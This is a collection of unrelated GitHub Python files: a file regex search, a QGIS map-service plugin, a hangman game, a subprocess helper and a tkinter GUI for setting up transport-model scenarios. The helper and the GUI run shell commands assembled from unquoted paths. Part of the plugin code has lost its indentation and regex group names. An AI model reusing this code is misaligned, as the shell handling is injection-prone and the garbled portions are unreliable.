{"seq_id":"42665709182","text":"import os\nimport re\nimport sys\n\ntry:\n    regexp_format = re.compile(r'{}'.format(input(\"Provide regexp\")))\nexcept re.error:\n    print(\"bad regexp\")\n    sys.exit()\n\nfor filename in os.listdir(os.getcwd()):\n    if filename.endswith(\".txt\"):\n        file = open(filename, \"r\")\n        for line in file.readlines():\n            z = re.search(regexp_format, line)\n            if z:\n                print(file.name + \": \")\n                print(line)\n        file.close()\n","repo_name":"mstachniuk/tietopythontraining-basic","sub_path":"lesson_09_reading_and_writing_files/reg_in_files.py","file_name":"reg_in_files.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"34362736432","text":"from owslib.wms import WebMapService\nfrom owslib.wfs import WebFeatureService\nfrom owslib.wmts import WebMapTileService\nfrom PyQt4.QtCore import QSettings\n\nimport re\n\nclass LdsInterface():\n    def __init__(self, api_key_instance):\n        self.api_key_instance = api_key_instance\n        self.key = self.api_key_instance.get_api_key()\n        self.resp = {}\n    \n    def keyChanged(self):\n        self.key = self.api_key_instance.get_api_key()\n    \n    def hasKey(self):\n        if not self.key:\n            return False\n        return True\n    \n    def getServiceData(self, service):\n        self.resp = {'err': None,\n                     'resp': None,\n                     'info': None}\n        \n        # Request - Get Info for the service\n        self.request(service)\n        if self.resp['err']:\n            return self.resp\n        \n        # Format the response data\n        self.service_info()\n        \n        return self.resp\n\n\n    def request(self, service):\n\n        try: \n\n            if service == 'WMS':\n                self.resp['resp'] = WebMapService(\"https://data.linz.govt.nz/services;\"\n                                                  \"key=\"+self.key+\n                                                  \"/wms/\", \n                                                  version='1.1.1')\n                return\n            if service == 'WMTS':\n                self.resp['resp'] = WebMapTileService(\"https://data.linz.govt.nz/services;\"\n                                                      \"key=\"+self.key+\n                                                      \"/wmts/1.0.0/WMTSCapabilities.xml?\"\n                                                      \"count=10\", \n                                                      version='1.0.0')\n                return\n            if service == 'WFS':\n                self.resp['resp'] = WebFeatureService(\"https://data.linz.govt.nz/services;\"\n                                                      \"key=\"+self.key+\n                                                      \"/wfs/?\"\n                                                      \"service=WFS&\"\n                                                      \"request=GetCapabilities\",\n                                                      version='1.1.0')\n                return\n        \n        except:\n            self.resp['err'] = \"ERROR: Something went wrong with the request. Timeout? 
Incorrect API KEY?\"\n\n # pass\n #how do I get at owslibs exceptions?\n \n def service_info(self):\n service_data = []\n resp = self.resp['resp']\n cont = (resp.contents)\n \n for c in cont:\n # standardise the different services string formatting\n cont_id = re.search(r'([aA-zZ]+\\.[aA-zZ]+\\.[aA-zZ]+\\.[aA-zZ]+\\:)?(?P[aA-zZ]+)-(?P[0-9]+)', resp[c].id)\n type = cont_id.group('type')\n id = cont_id.group('id')\n service_type = resp.identification.type.upper().strip('OGC:').strip(' ')\n \n service_data.append([type, id, service_type, resp[c].title, resp[c].abstract])\n \n self.resp['info'] = service_data\n \n \n ","repo_name":"SPlanzer/QGIS-LDS-Plugin","sub_path":"ldsplugin/lds_interface.py","file_name":"lds_interface.py","file_ext":"py","file_size_in_byte":3192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8880533129","text":"import gin\n\nfrom models.ActorCritic import ActorCritic, AtariActorCritic\n\n\n@gin.configurable\ndef create_dqn_agent(env):\n env_name = env.unwrapped.spec.id\n # action_space = env.action_space\n # observation_shape = env.observation_space.shape\n if env_name in [\"CartPole-v0\"]:\n return ActorCritic(env)\n elif env_name.startswith(\"Pong\"):\n return AtariActorCritic(env)\n\n raise ValueError(f\"Can't create DQN model for {env_name} environment\")\n","repo_name":"probably-nothing1/ActorCritic","sub_path":"src/models/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15573627043","text":"import random\n\n\nclass Color:\n \"\"\"\n Sets colors to be called for different texts.\n \"\"\"\n RESET = '\\033[0m'\n BLUE = '\\u001b[34m'\n GREEN = '\\033[92m'\n RED = '\\033[91m'\n YELLOW = '\\u001b[33m'\n\n\ndef get_new_word():\n \"\"\"\n Selects a random word from the words.txt file opened in read format\n at the beginning of the game.\n Ensures a new random word evry time the game is played.\n \"\"\"\n with open('words.txt', 'r') as word_list:\n words = word_list.readlines()\n any_word = random.choice(words)[:-1].upper()\n return any_word\n\n\ndef introduction_page():\n \"\"\"\n The initial introduction to the hangman game.\n The player can read the instuctions or begin the game.\n \"\"\"\n word = get_new_word()\n hangman_sign()\n print(hangman_construction(0))\n print(f\"Type {Color.BLUE}1 {Color.RESET} to start the game\\n\")\n print(f\"Type {Color.BLUE}2 {Color.RESET} to read the instructions\")\n selection = False\n while not selection:\n decision = input(\"\\n\")\n if decision == \"1\":\n selection = True\n begin_game(word)\n elif decision == \"2\":\n selection = True\n game_instructions()\n else:\n print(f\"\\n{Color.YELLOW}Please type {Color.BLUE}1 {Color.YELLOW}or\"\n f\"{Color.BLUE} 2 {Color.YELLOW}to make your decision.\"\n f\"{Color.RESET}\")\n\n\ndef game_instructions():\n \"\"\"\n Gives the player the instructions to play the game.\n \"\"\"\n print(\n \"\"\"\n The object of the game is to guess the word.\n Do this by entering in one letter each go.\n If you enter a wrong letter a life will be taken from you.\n If you lose all your lives, say goodbye to the hanging individual.\n Guess the word before your lives hit 0 and you are a hero.\n \"\"\"\n )\n\n begin = input(\"Press the enter key to begin the game.\\n\")\n introduction_page()\n\n\ndef begin_game(word):\n \"\"\"\n Starts the game for the user\n checks if the letter the player inputs is in the hidden 
word.\n if the letter is correct,game will iterate through hidden word\n and letter will go into correct position.\n if incorrect,a message will be relayed to the user.\n player can see how many lives are left to complete the game.\n\n \"\"\"\n correct_word = \"_\" * len(word)\n completed = False\n guessed_letters = []\n lives = 6\n print(\"Help Me!!!\\n\")\n print(f\"Lives left {lives}\\n\")\n while completed is not True and lives > 0:\n print(hangman_construction(lives))\n print(correct_word)\n guess = input('Give me some letters please \\n')\n if len(guess) == 1 and guess.isalpha(\n ) and guess not in guessed_letters:\n if guess.upper() in word:\n guessed_letters.append(guess)\n word_list = list(correct_word)\n indices = [i for i, letter in enumerate(\n word) if letter == guess.upper()]\n for index in indices:\n word_list[index] = guess\n correct_word = \"\".join(word_list)\n print(f\"\\n{Color.GREEN}Great!! {Color.RESET}{guess}\"\n f\" {Color.GREEN}is in the word! \\n{Color.RESET}\")\n if '_' not in correct_word:\n completed = True\n else:\n print(f\"\\n{Color.YELLOW}Oh no! {Color.RESET}{guess}\"\n f\"{Color.YELLOW} isn't in the word!\\n{Color.RESET}\")\n lives -= 1\n print(f\"Lives left: {lives} \\n\")\n guessed_letters.append(guess)\n print(\n \"Tried these already: \" +\n \", \".join(guessed_letters) +\n \"\\n\")\n elif len(guess) != 1:\n print(f\"\\n{Color.YELLOW}Oops!, \"\n f\"Your only allowed to guess {Color.RESET}1\"\n f\" {Color.YELLOW}letter at a time.\")\n print(f\"You used {Color.RESET}{len(guess)} \"\n f\"{Color.YELLOW}characters.\\n{Color.RESET}\")\n elif guess in guessed_letters:\n print(f\"\\n{Color.YELLOW}You have already used me\"\n f\" {Color.RESET}{guess}{Color.YELLOW}!{Color.RESET}\")\n lives -= 1\n if completed:\n win_sign()\n print(f\"{Color.GREEN}Well Done!\"\n \"You are a hero!\")\n else:\n lose_sign()\n print(\"Looks like you arent a hero, \"\n \"Do NOT quit your day job.\")\n print(f\"The word was: {Color.RESET}{word}{Color.RED}.{Color.RESET}\")\n start_game_again()\n\n\ndef start_game_again():\n \"\"\"\n Asks if the user wants to start the game again.\n If not, returns to main screen.\n \"\"\"\n start_again_option = input(f\"\\nWould you like to try again? \"\n f\"{Color.BLUE}Y{Color.RESET}/{Color.BLUE}N\\n\"\n f\"{Color.RESET}\").upper()\n if start_again_option == \"Y\":\n word = get_new_word()\n begin_game(word)\n elif start_again_option == \"N\":\n exit()\n else:\n print(\n f\"{Color.YELLOW}Time to decide {Color.BLUE}Y {Color.YELLOW}\"\n f\"or {Color.BLUE}N{Color.YELLOW}. 
You chose \"\n f\"{Color.RESET}{start_again_option}{Color.YELLOW}.{Color.RESET}\\n\")\n start_game_again()\n\n\ndef hangman_construction(lives):\n \"\"\"\n Shows the user how man lives are left before the games ends.\n \"\"\"\n stages = [f\"\"\"\n =======\n |/ |\n | {Color.RED}@{Color.RESET}\n | /|\\\\\n | |\n | / \\\\\n _____|_________\n / |\\\\ /|\n ______________ / /\n | /\n ______________ /\n \"\"\",\n f\"\"\"\n =======\n |/ |\n | {Color.RED}@{Color.RESET}\n | /|\\\\\n | |\n | /\n _____|_________\n / |\\\\ /|\n ______________ / /\n | /\n ______________ /\n \"\"\",\n f\"\"\"\n =======\n |/ |\n | {Color.RED}@{Color.RESET}\n | /|\\\\\n | |\n |\n _____|_________\n / |\\\\ /|\n ______________ / /\n | /\n ______________ /\n \"\"\",\n f\"\"\"\n =======\n |/ |\n | {Color.RED}@{Color.RESET}\n | /|\n | |\n |\n _____|_________\n / |\\\\ /|\n ______________ / /\n | /\n ______________ /\n \"\"\",\n f\"\"\"\n =======\n |/ |\n | {Color.RED}@{Color.RESET}\n | |\n | |\n |\n _____|_________\n / |\\\\ /|\n ______________ / /\n | /\n ______________ /\n \"\"\",\n f\"\"\"\n =======\n |/ |\n | {Color.RED}@{Color.RESET}\n |\n |\n |\n _____|_________\n / |\\\\ /|\n ______________ / /\n | /\n ______________ /\n \"\"\",\n \"\"\"\n =======\n |/ |\n |\n |\n |\n |\n _____|_________\n / |\\\\ /|\n ______________ / /\n | /\n ______________ /\n \"\"\"\n ]\n return stages[lives]\n\n\ndef hangman_sign():\n \"\"\"\n A title graphic to be displayed on the title screen.\n \"\"\"\n print(\n \"\"\"\n ██╗ ██╗█████╗███╗ ██╗██████╗███╗ ███╗█████╗███╗ ██╗\n ██║ ████╔══██████╗ ████╔════╝████╗ ██████╔══██████╗ ██║\n ████████████████╔██╗ ████║ █████╔████╔███████████╔██╗ ██║\n ██╔══████╔══████║╚██╗████║ ████║╚██╔╝████╔══████║╚██╗██║\n ██║ ████║ ████║ ╚████╚██████╔██║ ╚═╝ ████║ ████║ ╚████║\n ╚═╝ ╚═╚═╝ ╚═╚═╝ ╚═══╝╚═════╝╚═╝ ╚═╚═╝ ╚═╚═╝ ╚═══\n \"\"\"\n )\n\n\ndef win_sign():\n \"\"\"\n Displays a win sign for when the player correctly guesses the word\n to let them know they were correct.\n \"\"\"\n print(\n f\"\"\"{Color.GREEN}\n ::: ::: ::::::::::: :::: :::\n :+: :+: :+: :+:+: :+:\n +:+ +:+ +:+ :+:+:+ +:+\n +#+ +:+ +#+ +#+ +#+ +:+ +#+\n +#+ +#+#+ +#+ +#+ +#+ +#+#+#\n#+#+# #+#+# #+# #+# #+#+#\n### ### ########### ### ####\n {Color.RESET}\"\"\"\n )\n\n\ndef lose_sign():\n \"\"\"\n Displays a lose sign for when the player fails to guess the word\n to let them know the lost the game.\n \"\"\"\n print(\n f\"\"\"{Color.RED}\n :::::::::: ::: ::::::::::: :::\n :+: :+: :+: :+: :+:\n +:+ +:+ +:+ +:+ +:+\n :#::+::# +#++:++#++: +#+ +#+\n +#+ +#+ +#+ +#+ +#+\n #+# #+# #+# #+# #+#\n ### ### ### ########### ##########\n {Color.RESET}\"\"\"\n )\n\n\nintroduction_page()\n\n","repo_name":"Ryan-Martin22/hangman-2022","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":9848,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"1412372153","text":"import subprocess\n\n# class bash_exe:\n# \tdef __init__(self):\n# \t\tpass\n\ndef execute_command(cmdlist,repopath,out,err):\n\tcmd = \" \".join(cmdlist)\n\treturn_code = subprocess.Popen('cd '+ repopath + ' && ' +cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\tstatus = return_code.returncode\n\toutput, error = return_code.communicate()\n\twith open(out,'wb') as f:\n\t\tf.write(output)\n\twith open(err,'wb') as f:\n\t\tf.write(error)\n\n# if __name__ == '__main__':\n# \tbe = bash_exe()\n# \tcmd = ['ls','-l']\n# \tstdout = 'stdout.txt'\n# \tstderr = 'stderr.txt'\n# 
\tbe.execute_command(cmd,\"/home/lingling/wubozhi/datapreprocess/commits\",stdout,stderr)","repo_name":"wubozhi/repos2cpg","sub_path":"bash_exe.py","file_name":"bash_exe.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41515470563","text":"# import tkinter\r\n# import tkconstants\r\n# import tkFileDialog\r\nimport os\r\n# from tkinter import *\r\nimport tkinter\r\nfrom tkinter import constants\r\nfrom tkinter import filedialog\r\n#from tkMessageBox import showerror\r\n# from PIL import Image,ImageTk\r\nimport popupMsg\r\n\r\nclass SelectStudyYears(tkinter.Frame):\r\n def __init__(self, root, parent):\r\n tkinter.Frame.__init__(self, root, border = 5)\r\n self.root = root\r\n self.parent = parent\r\n body = tkinter.Frame(self)\r\n body.pack(fill=constants.X, expand=1)\r\n body.grid_columnconfigure(1, weight=2)\r\n\r\n current_row = 0\r\n tkinter.Label(body, text=u\"Year Selection\", font=(\"Helvetica\", 10, 'bold')).grid(row=current_row)\r\n current_row += 1\r\n\r\n self.is_selected_year = {}\r\n for year in parent.studyYearList:\r\n self.is_selected_year[year] = tkinter.BooleanVar(self.root)\r\n if year in parent.selected_study_years:\r\n self.is_selected_year[year].set(True)\r\n tkinter.Checkbutton(body, text = year, variable = self.is_selected_year[year], font = (\"Helvetica\", 8)).grid(row=current_row, sticky = 'W')\r\n current_row += 1\r\n\r\n tkinter.Button(body, text=u\"Select\", font=(\"Helvetica\", 8, 'bold'),width=10,command=lambda: self.record_selection()).grid(row=current_row)\r\n\r\n def record_selection(self):\r\n selection = []\r\n for year in self.is_selected_year:\r\n if self.is_selected_year[year].get():\r\n selection.append(year)\r\n self.parent.selected_study_years = ','.join(selection)\r\n self.parent.studyyears.delete(0, constants.END)\r\n self.parent.studyyears.insert(0, self.parent.selected_study_years)\r\n self.root.destroy()\r\n pass\r\n\r\n\r\nclass CreateScenarioGUI(tkinter.Frame):\r\n def __init__(self, root, emme_version = \"4.3.7\", year = \"2016\", geo = \"1\", lu = \"DS41\"):\r\n tkinter.Frame.__init__(self, root, border=5)\r\n body = tkinter.Frame(self)\r\n body.pack(fill=constants.X, expand=1)\r\n sticky = constants.E + constants.W\r\n body.grid_columnconfigure(1, weight=2)\r\n\r\n #Define land use options\r\n self.lu_options = {\"DS41\": {\"name\": \"Baseline\",\r\n \"years\": [\"2020\", \"2025nb\", \"2030nb\", \"2035nb\", \"2040nb\", \"2050nb\"]},\r\n \"DS42\": {\"name\": \"Sustainable Community Strategy\",\r\n \"years\": [\"2016\", \"2023\", \"2025\", \"2026\", \"2029\", \"2030\", \"2032\", \"2035\", \"2040\", \"2050\"]}}\r\n\r\n self.root = root\r\n self.emme_version = emme_version\r\n self.year = year\r\n self.geo = geo \r\n self.lu = lu\r\n \r\n if self.year not in self.lu_options[self.lu][\"years\"]:\r\n if self.year in self.lu_options[\"DS41\"][\"years\"]:\r\n self.lu = \"DS41\"\r\n else:\r\n self.lu = \"DS42\"\r\n\r\n yearOptionList = []\r\n for lu in self.lu_options:\r\n yearOptionList += self.lu_options[lu][\"years\"]\r\n yearOptionList = list(set(yearOptionList)) #Remove duplicates\r\n yearOptionList.sort()\r\n\r\n self.yearOptionList = yearOptionList\r\n self.studyYearList = [\"2016\", \"2020\", \"2023\", \"2025_Vision\", \"2025nb\", \"2026_Vision\", \"2029_Vision\",\r\n \"2030_Vision\", \"2030nb\", \"2032_Vision\", \"2035_Vision\", \"2035nb\", \"2040_Vision\",\r\n \"2040nb\", \"2050_Vision\", \"2050nb\"]\r\n\r\n #divider line\r\n 
divider=u\"_\"*200\r\n self.releaseDir='T:\\\\ABM\\\\release\\\\ABM'\r\n self.defaultScenarioDir=\"T:\\\\projects\\\\sr14\"\r\n self.defaultNetworkDir=\"T:\\\\RTP\\\\2021RP\\\\2021rp_final\\\\network_build\"\r\n\r\n current_row = 0\r\n n_columns = 3\r\n\r\n self.buttonVar= tkinter.IntVar(root)\r\n self.yButton=tkinter.Radiobutton(body, text=\"Yes\", variable=self.buttonVar, value=1, command=self.initStudy)\r\n self.nButton=tkinter.Radiobutton(body, text=\"No\", variable=self.buttonVar, value=0,command=self.initStudy)\r\n tkinter.Label(body, text=u\"Release Version 14.3.0\\n\"+divider, font=(\"Helvetica\", 11, 'bold'), width=50, fg='royal blue').grid(row=current_row,columnspan=5)\r\n current_row += 1\r\n tkinter.Label(body, text=u\"Create an ABM Work Space\", font=(\"Helvetica\", 10, 'bold')).grid(row=current_row,columnspan=n_columns)\r\n current_row += 1\r\n self.yButton.grid(row=current_row,column=0, columnspan=n_columns-1)\r\n self.nButton.grid(row=current_row,column=1, columnspan=n_columns-1)\r\n current_row += 1\r\n\r\n tkinter.Label(body, text=u\"Study Folder\", font=(\"Helvetica\", 8, 'bold')).grid(row=current_row)\r\n self.studypath = tkinter.Entry(body, width=40)\r\n self.studypath.grid(row=current_row, column=1, sticky=sticky)\r\n self.studypath.delete(0, constants.END)\r\n self.studypath.insert(0, self.defaultScenarioDir)\r\n self.studybutton = tkinter.Button(body, text=u\"...\",width=4,command=lambda:self.get_path(\"study\"))\r\n self.studybutton.grid(row=current_row, column=n_columns-1)\r\n current_row += 1\r\n\r\n tkinter.Label(body, text=u\"Network Folder\",font=(\"Helvetica\", 8, 'bold')).grid(row=current_row)\r\n self.studynetworkpath = tkinter.Entry(body, width=40)\r\n self.studynetworkpath.grid(row=current_row, column=1, sticky=sticky)\r\n self.studynetworkpath.delete(0, constants.END)\r\n self.studynetworkpath.insert(0, self.defaultNetworkDir)\r\n self.studynetworkbutton = tkinter.Button(body, text=u\"...\",width=4,command=lambda: self.get_path(\"studynetwork\"))\r\n self.studynetworkbutton.grid(row=current_row, column=n_columns-1)\r\n self.selected_study_years = ''\r\n current_row += 1\r\n\r\n tkinter.Label(body, text=u\"Year Selection\",font=(\"Helvetica\", 8, 'bold')).grid(row=current_row)\r\n self.studyyears = tkinter.Entry(body, width=40)\r\n self.studyyears.grid(row=current_row, column=1, sticky=sticky)\r\n self.studyyears.delete(0, constants.END)\r\n self.studyyearsbutton = tkinter.Button(body, text=u\"...\",width=4,command=lambda: self.select_study_years())\r\n self.studyyearsbutton.grid(row=current_row, column=n_columns-1)\r\n current_row += 1\r\n \r\n self.copyButton = tkinter.Button(body, text=u\"Create\", font=(\"Helvetica\", 8, 'bold'),width=10, command=lambda: self.checkPath(\"study\"))\r\n self.copyButton.grid(row=current_row,column=0,columnspan=n_columns+1)\r\n current_row += 1\r\n\r\n tkinter.Label(body, text=divider, font=(\"Helvetica\", 11, 'bold'), width=50, fg='royal blue').grid(row=current_row,columnspan=n_columns+2)\r\n current_row += 1\r\n tkinter.Label(body, text=u\"Create an ABM scenario\", font=(\"Helvetica\", 10, 'bold')).grid(row=current_row,columnspan=n_columns)\r\n current_row += 1\r\n\r\n #tkinter.Label(body, text=u\"Version\", font=(\"Helvetica\", 8, 'bold')).grid(row=8)\r\n #var = StringVar(root)\r\n self.version=\"version_14_3_0\"\r\n #optionList=[\"version_14_2_2\"]\r\n #option=tkinter.OptionMenu(body,var,*optionList,command=self.setversion)\r\n #option.config(width=50)\r\n #option.grid(row=8, column=1)\r\n\r\n tkinter.Label(body, 
text=u\"Emme Version\", font=(\"Helvetica\", 8, 'bold')).grid(row=current_row)\r\n var = tkinter.StringVar(root)\r\n #self.emme_version = \"4.4.4.1\"\r\n optionList = [\"4.3.7\"]\r\n var.set(self.emme_version)\r\n option = tkinter.OptionMenu(body, var, *optionList, command=self.setEmmeVersion)\r\n option.config(width=50)\r\n option.grid(row=current_row, column=1)\r\n current_row += 1\r\n\r\n tkinter.Label(body, text=u\"Year\", font=(\"Helvetica\", 8, 'bold')).grid(row=current_row)\r\n var = tkinter.StringVar(root)\r\n #self.year=\"2016\"\r\n #yearOptionList = [\"2016\", \"2020\", \"2023\", \"2025\", \"2025nb\", \"2026\", \"2029\", \"2030\", \"2030nb\", \"2032\", \"2035\", \"2035nb\", \"2040\", \"2040nb\", \"2050\",\"2050nb\"]\r\n #if self.select_lu:\r\n var.set(self.year)\r\n #else:\r\n # var.set(\"Select Year\")\r\n option=tkinter.OptionMenu(body,var,*yearOptionList,command=self.setyear)\r\n option.config(text = self.year)\r\n option.config(width=50)\r\n option.grid(row=current_row, column=1)\r\n current_row += 1\r\n #option.pack(expand = True)\r\n\t\t\t\r\n tkinter.Label(body, text=u\"Land Use\", font=(\"Helvetica\", 8, 'bold')).grid(row=current_row)\r\n #self.lu=\"DS41\"\r\n #if self.select_lu:\r\n var = tkinter.StringVar(root)\r\n var.set(self.lu + '-' + self.lu_options[self.lu][\"name\"])\r\n #if self.year in self.invalid_combos[\"DS42\"]:\r\n # luOptionList = [\"DS41-Baseline\"]\r\n #elif self.year in self.invalid_combos[\"DS41\"]:\r\n # luOptionList = [\"DS42-Sustainable Community Strategy\"]\r\n #else:\r\n # luOptionList = [\"DS41-Baseline\", \"DS42\"]\r\n luOptionList = []\r\n for lu in self.lu_options:\r\n if self.year in self.lu_options[lu][\"years\"]:\r\n luOptionList.append(lu + '-' + self.lu_options[lu][\"name\"])\r\n option=tkinter.OptionMenu(body,var,*luOptionList,command=self.setLU)\r\n\r\n option.config(width=50)\r\n option.grid(row=current_row, column=1)\r\n current_row += 1\r\n\r\n tkinter.Label(body, text=u\"Geography ID\", font=(\"Helvetica\", 8, 'bold')).grid(row=current_row)\r\n #self.geo=\"1\"\r\n self.geo = tkinter.Entry(body, width=40)\r\n self.geo.grid(row=current_row, column=1, sticky=sticky)\r\n self.geo.delete(0, constants.END)\r\n self.geo.insert(0, 1)\r\n current_row += 1\r\n #option.pack(expand = True)\r\n\t\t\t\r\n tkinter.Label(body, text=u\"Scenario Folder\", font=(\"Helvetica\", 8, 'bold')).grid(row=13)\r\n self.scenariopath = tkinter.Entry(body, width=40)\r\n self.scenariopath.grid(row=current_row, column=1, sticky=sticky)\r\n button = tkinter.Button(body, text=u\"...\",width=4,command=lambda: self.get_path(\"scenario\"))\r\n button.grid(row=current_row, column=2)\r\n current_row += 1\r\n\r\n tkinter.Label(body, text=u\"Network Folder\",font=(\"Helvetica\", 8, 'bold')).grid(row=14)\r\n self.networkpath = tkinter.Entry(body, width=40)\r\n self.networkpath.grid(row=current_row, column=1, sticky=sticky)\r\n button = tkinter.Button(body, text=u\"...\",width=4,command=lambda: self.get_path(\"network\"))\r\n button.grid(row=current_row, column=2)\r\n current_row += 1\r\n\r\n buttons = tkinter.Frame(self)\r\n buttons.pack()\r\n botton = tkinter.Button(buttons, text=u\"Create\", font=(\"Helvetica\", 8, 'bold'),width=10, command=lambda: self.checkPath(\"scenario\"))\r\n botton.pack(side=constants.LEFT)\r\n #botton.grid(row=13, column = 0)\r\n tkinter.Frame(buttons, width=10).pack(side=constants.LEFT)\r\n button = tkinter.Button(buttons, text=u\"Quit\", font=(\"Helvetica\", 8, 'bold'), width=10, command=self.quit)\r\n button.pack(side=constants.RIGHT)\r\n 
#button.grid(row = 13, columns = 2)\r\n\r\n self.defaultpath=self.releaseDir+\"\\\\\"+self.version+'\\\\input\\\\'+self.year\r\n self.scenariopath.delete(0, constants.END)\r\n self.scenariopath.insert(0, self.defaultScenarioDir)\r\n self.networkpath.delete(0, constants.END)\r\n self.networkpath.insert(0, self.defaultpath)\r\n\r\n self.initStudy()\r\n\r\n def initStudy(self):\r\n #disable study setting buttons\r\n if self.buttonVar.get()==1:\r\n self.studypath.config(state=tkinter.NORMAL)\r\n self.studybutton.config(state=tkinter.NORMAL)\r\n self.studynetworkpath.config(state=tkinter.NORMAL)\r\n self.studynetworkbutton.config(state=tkinter.NORMAL)\r\n self.studyyears.config(state=tkinter.NORMAL)\r\n self.studyyearsbutton.config(state=tkinter.NORMAL)\r\n self.copyButton.configure(state=tkinter.NORMAL)\r\n #enable study setting buttons\r\n elif self.buttonVar.get()==0:\r\n self.studypath.config(state=tkinter.DISABLED)\r\n self.studybutton.config(state=tkinter.DISABLED)\r\n self.studynetworkpath.config(state=tkinter.DISABLED)\r\n self.studynetworkbutton.config(state=tkinter.DISABLED)\r\n self.studyyears.config(state=tkinter.DISABLED)\r\n self.studyyearsbutton.config(state=tkinter.DISABLED)\r\n self.copyButton.configure(state=tkinter.DISABLED)\r\n\r\n #set default input and network paths based on selected year\r\n def setversion(self,value):\r\n self.version=value\r\n return\r\n\r\n # set Emme version\r\n def setEmmeVersion(self, value):\r\n self.emme_version = value\r\n return\r\n\r\n #set default input and network paths based on selected year\r\n def setyear(self,value):\r\n self.year=value\r\n #Refresh the GUI with inputs already entered\r\n self.destroy()\r\n CreateScenarioGUI(self.root, self.emme_version, self.year, self.geo, self.lu).pack(fill=constants.X, expand=1)\r\n return\r\n\r\n # set Geography Set ID\r\n def setgeo(self, value):\r\n self.geo = value\r\n return\r\n\r\n # set land use\r\n def setLU(self,value):\r\n self.lu = value.split(\"-\")[0]\r\n return\r\n\r\n #set cluster\r\n def setcluster(self,value):\r\n self.cluster=value\r\n return\r\n\r\n #set default options for folded browsers\r\n def setPathOptions(self):\r\n self.dir_opt = options = {}\r\n options['initialdir'] = self.defaultScenarioDir\r\n options['mustexist'] = False\r\n options['parent'] = root\r\n options['title'] = 'This is a title'\r\n\r\n #get a path after the browse button is clicked on\r\n def get_path(self,type):\r\n self.setPathOptions()\r\n path = filedialog.askdirectory(**self.dir_opt)\r\n if type==\"scenario\":\r\n if path:\r\n spath = os.path.normpath(path)\r\n self.scenariopath.delete(0, constants.END)\r\n self.scenariopath.insert(0, spath)\r\n elif type==\"network\":\r\n if path:\r\n npath = os.path.normpath(path)\r\n self.networkpath.delete(0, constants.END)\r\n self.networkpath.insert(0, npath)\r\n elif type==\"study\":\r\n if path:\r\n studypath = os.path.normpath(path)\r\n self.studypath.delete(0, constants.END)\r\n self.studypath.insert(0, studypath)\r\n elif type==\"studynetwork\":\r\n if path:\r\n studynetworkpath = os.path.normpath(path)\r\n self.studynetworkpath.delete(0, constants.END)\r\n self.studynetworkpath.insert(0, studynetworkpath)\r\n return\r\n\r\n #check if a path already exisits or is empty\r\n def checkPath(self,type):\r\n self.popup=tkinter.Tk()\r\n if type==\"scenario\":\r\n #Check if invalid year/land use combo and don't create scenario if that is the case\r\n #if self.year not in self.lu_options[self.lu][\"years\"]: \r\n # showerror(\"Error\", \"Invalid year/land use 
combination\")\r\n # return\r\n if os.path.exists(self.scenariopath.get()):\r\n if not self.networkpath.get():\r\n popupMsg.popupmsg(self,\"Network folder is empty!\",1,type)\r\n else:\r\n popupMsg.popupmsg(self,\"Selected scenario folder already exists! Proceeding will overwrite existing files!\",2,type)\r\n else:\r\n if not self.scenariopath.get():\r\n popupMsg.popupmsg(self,\"Scenario folder is empty!\",1,type)\r\n elif not self.networkpath.get():\r\n popupMsg.popupmsg(self,\"Network folder is empty!\",1,type)\r\n else:\r\n self.executeBatch(type)\r\n elif type==\"study\":\r\n if os.path.exists(self.studypath.get()):\r\n if not self.studynetworkpath.get():\r\n popupMsg.popupmsg(self,\"Network folder is empty!\",1,type)\r\n else:\r\n popupMsg.popupmsg(self,\"Selected study folder already exists! Proceeding will overwrite existing files!\",2,type)\r\n else:\r\n if not self.studypath.get():\r\n popupMsg.popupmsg(self,\"Study folder is empty!\",1,type)\r\n elif not self.studynetworkpath.get():\r\n popupMsg.popupmsg(self,\"Network folder is empty!\",1,type)\r\n else:\r\n self.executeBatch(type)\r\n return\r\n\r\n def select_study_years(self):\r\n selection_root = tkinter.Tk()\r\n SelectStudyYears(selection_root, self).pack(fill=constants.X, expand=1)\r\n\r\n #Update properties file\r\n def update_property(self, old, new):\r\n property_file = os.path.join(self.scenariopath.get(), 'conf', 'sandag_abm.properties')\r\n property_file = property_file.replace('\\\\\\\\', '/')\r\n with open(property_file, 'r') as file :\r\n filedata = file.read()\r\n filedata = filedata.replace(old, new)\r\n with open(property_file, 'w') as file:\r\n file.write(filedata)\r\n\r\n #execute DOS commands\r\n def executeBatch(self, type):\r\n self.popup.destroy()\r\n if type==\"scenario\":\r\n commandstr = u\"create_scenario.cmd %s %s %s %s\" % (\r\n self.scenariopath.get(),\r\n self.year,\r\n self.networkpath.get(),\r\n self.emme_version\r\n )\r\n os.chdir(self.releaseDir+\"\\\\\"+self.version+'\\\\')\r\n os.system(commandstr)\r\n #self.update_property(\"version=version_14_2_2\", \"version=version_14_2_2\\nLU version=\" + self.lu)\r\n self.update_property(\"version=version_14_3_0\", \"version=version_14_3_0\\nLU version=\" + self.lu)\r\n self.update_property(\"geographyID=1\", \"geographyID=\" + self.geo.get())\r\n elif type==\"study\":\r\n studyyears = self.studyyears.get().split(',')\r\n exclude_file = self.studynetworkpath.get() + '\\\\exclude.txt'\r\n exclude = [\"exclude.txt\", \"\\\\2050_vision_nopurple\\\\\"]\r\n for year in self.studyYearList:\r\n if year not in studyyears:\r\n exclude.append(\"\\\\\" + year + \"\\\\\")\r\n f = open(exclude_file, 'w')\r\n f.write('\\n'.join(exclude))\r\n f.close()\r\n commandstr=u\"copy_networkfiles_to_study.cmd \"+self.studypath.get()+\" \"+self.studynetworkpath.get()\r\n print(commandstr)\r\n os.chdir(self.releaseDir+\"\\\\\"+self.version+'\\\\')\r\n os.system(commandstr) \r\n os.remove(exclude_file)\r\n self.popup=tkinter.Tk()\r\n msg=\"You have successfully created the \"+ type+\"!\"\r\n popupMsg.popupmsg(self,msg,1,type)\r\n return\r\n\r\nroot = 